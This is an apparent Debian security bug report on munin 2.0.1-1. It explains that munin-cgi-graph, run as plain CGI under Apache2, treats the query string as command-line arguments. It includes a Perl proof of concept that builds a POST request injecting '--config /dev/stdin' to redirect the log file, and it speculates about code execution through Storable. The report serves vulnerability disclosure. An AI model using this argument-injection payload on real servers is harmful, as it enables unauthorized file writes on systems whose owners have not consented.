Package: munin Version: 2.0.1-1 Severity: grave Tags: security X-Debbugs-CC: hel...@subdivi.de
http://www.munin-monitoring.org/ticket/1238 When running munin-cgi-graph as a CGI-script (not FastCGI) under Apache2, Apache2 may use the query-string as command line arguments. This will write "2012/07/04 18:03:57 Opened log file" to /tmp/123.txt (this didn't work for helmut, but ?--help also demonstrated the problem): my $data = "logdir /tmp/123.txt\0\n"; print "POST /cgi-bin/munin-cgi-graph/x.png?--config+/dev/stdin HTTP/1.1\r\n" . "Host: 127.0.0.1\r\n" . "Connection: close\r\n" . "Content-Length: ".length($data)."\r\n" . "\r\n" . $data; munin will check the query-string for bad characters after opening the log file and terminate, limiting the possible damage. munin will also try opening "$conf.storable" using perl's Storable module. I'm not sure if this can be used to provide code execution like python's pickle. -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
